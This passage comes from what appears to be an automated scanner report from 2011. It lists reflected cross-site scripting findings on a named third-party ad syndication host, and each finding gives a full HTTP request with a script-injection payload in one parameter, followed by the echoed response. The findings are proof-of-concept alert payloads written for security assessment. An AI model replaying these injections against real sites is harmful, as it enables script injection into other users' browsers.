This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business&banner=Button_180x90_Image&category=574c8dc<script>alert(1)</script>715c4b4f13d&i=3&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1104
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business&banner
...[SNIP]...
true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx?p6(ct1&cd574c8dc<script>alert(1)</script>715c4b4f13di99&fCampaigns_Local_Audience~1=Business!)[]&i=3&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business",category:"574c8dc<
...[SNIP]...

2.69. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload 7e208<script>alert(1)</script>87a6a757e4a was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business&banner=Button_180x90_Image&category=57&i=37e208<script>alert(1)</script>87a6a757e4a&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1063
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign&audience=Business&banner
...[SNIP]...
bj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]&i=37e208<script>alert(1)</script>87a6a757e4a&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Business",category:"57",banner:"Button_180x90_Image",domain:"c63445482505619
...[SNIP]...

2.70. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/CSP [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 66fba<script>alert(1)</script>42af6da8ff was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign66fba<script>alert(1)</script>42af6da8ff&audience=Business&banner=Button_180x90_Image&category=57&i=3&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 675
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=69421819&t=campaign66fba%3Cscript%3Ealert(1)
...[SNIP]...
tton_180x90_Image&category=57&i=3&parentUrl=http%3A//www.cybertronpc.com/";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaign66fba<script>alert(1)</script>42af6da8ff",project:"microsoft",show:"false"};
$$.processQueue(scriptname);
} catch (ex) {
$$.log("Error in Queue:" + ex);
};
})(CSP_GLOBAL);
}

2.71. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload 62e8a<script>alert(1)</script>0170ab71f was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]&i=3&banner=Button_180x90_Image62e8a<script>alert(1)</script>0170ab71f HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1855
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...



if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]&i=3&banner=Button_180x90_Image62e8a<script>alert(1)</script>0170ab71f";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "3", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.72. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload e51aa<script>alert(1)</script>15d8b4afdf5 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]&i=3e51aa<script>alert(1)</script>15d8b4afdf5&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 2092
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
n(instance) {
if (typeof (this.collection[instance]) != "undefined")
return this.collection[instance];
else return null;
}
};
}

CspCampaigns.Init("3e51aa<script>alert(1)</script>15d8b4afdf5", "1");


(function(collection, instance) {
var c = new CspCampaign("Micr_BusinessPC_Res_Cus_Bus", "https://12.contentcastsyndication.com/FTP/Campaign/Microsoft/Micr_BusinessPC_Res_Bus/en/Banners/
...[SNIP]...

2.73. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 88f32<script>alert(1)</script>f98e5ddabed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]&i=3&banner=Button_180x90_Image&88f32<script>alert(1)</script>f98e5ddabed=1 HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1972
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]&i=3&banner=Button_180x90_Image&88f32<script>alert(1)</script>f98e5ddabed=1";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "3", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.74. http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com/d1.aspx [p6(ct1&cd57i99&fCampaigns_Local_Audience~1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the p6(ct1&cd57i99&fCampaigns_Local_Audience~1 request parameter is copied into the HTML document as plain text between tags. The payload a2d4f<script>alert(1)</script>dcb24586c78 was submitted in the p6(ct1&cd57i99&fCampaigns_Local_Audience~1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]a2d4f<script>alert(1)</script>dcb24586c78&i=3&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i3.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1969
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:57 GMT
Date: Fri, 30 Sep 2011 13:28:57 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
tance);
})(CspCampaigns, "3");


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd57i99&fCampaigns_Local_Audience~1=Business!)[]a2d4f<script>alert(1)</script>dcb24586c78&i=3&banner=Button_180x90_Image";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "3", l: "EN", fb: 1?false:true};
if ($$.script
...[SNIP]...

2.75. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [audience parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the audience request parameter is copied into the HTML document as plain text between tags. The payload 984ac<script>alert(1)</script>9ec781ae40a was submitted in the audience parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer984ac<script>alert(1)</script>9ec781ae40a&banner=Button_180x90_Image&category=53&i=4&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1099
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer984ac%3C
...[SNIP]...
cal_Audience~1=Consumer984acscriptalert(1)/script9ec781ae40a!)[]&i=4&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer984ac<script>alert(1)</script>9ec781ae40a",category:"53",banner:"Button_180x90_Image",domain:"c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com"};
$$.processQueue(scriptname);
} catch (ex) {
$$
...[SNIP]...

2.76. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload 11f0e<script>alert(1)</script>f6c73b36d2 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer&banner=Button_180x90_Image11f0e<script>alert(1)</script>f6c73b36d2&category=53&i=4&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1100
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer&banner=
...[SNIP]...
aign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=4&banner=Button_180x90_Image11f0e<script>alert(1)</script>f6c73b36d2",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer",category:"53",banner:"Button_180x90_Image11f0e<script>
...[SNIP]...

2.77. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the category request parameter is copied into the HTML document as plain text between tags. The payload c6a42<script>alert(1)</script>bf8f0c0751c was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer&banner=Button_180x90_Image&category=53c6a42<script>alert(1)</script>bf8f0c0751c&i=4&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1103
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer&banner=
...[SNIP]...
true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx?p6(ct1&cd53c6a42<script>alert(1)</script>bf8f0c0751ci99&fCampaigns_Local_Audience~1=Consumer!)[]&i=4&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer",category:"53c6a42<
...[SNIP]...

2.78. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload c7fa7<script>alert(1)</script>9c0c18ead7 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer&banner=Button_180x90_Image&category=53&i=4c7fa7<script>alert(1)</script>9c0c18ead7&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1060
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign&audience=Consumer&banner=
...[SNIP]...
bj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=4c7fa7<script>alert(1)</script>9c0c18ead7&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer",category:"53",banner:"Button_180x90_Image",domain:"c63445482505619
...[SNIP]...

2.79. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/CSP [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 4b5d7<script>alert(1)</script>63a20577d7a was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign4b5d7<script>alert(1)</script>63a20577d7a&audience=Consumer&banner=Button_180x90_Image&category=53&i=4&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 676
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=9669240&t=campaign4b5d7%3Cscript%3Ealert(1)%
...[SNIP]...
tton_180x90_Image&category=53&i=4&parentUrl=http%3A//www.cybertronpc.com/";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaign4b5d7<script>alert(1)</script>63a20577d7a",project:"microsoft",show:"false"};
$$.processQueue(scriptname);
} catch (ex) {
$$.log("Error in Queue:" + ex);
};
})(CSP_GLOBAL);
}

2.80. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload e3580<script>alert(1)</script>73b593f2504 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=4&banner=Button_180x90_Imagee3580<script>alert(1)</script>73b593f2504 HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1862
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...



if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=4&banner=Button_180x90_Imagee3580<script>alert(1)</script>73b593f2504";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "4", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.81. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload 4b386<script>alert(1)</script>7f5ba6a478e was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

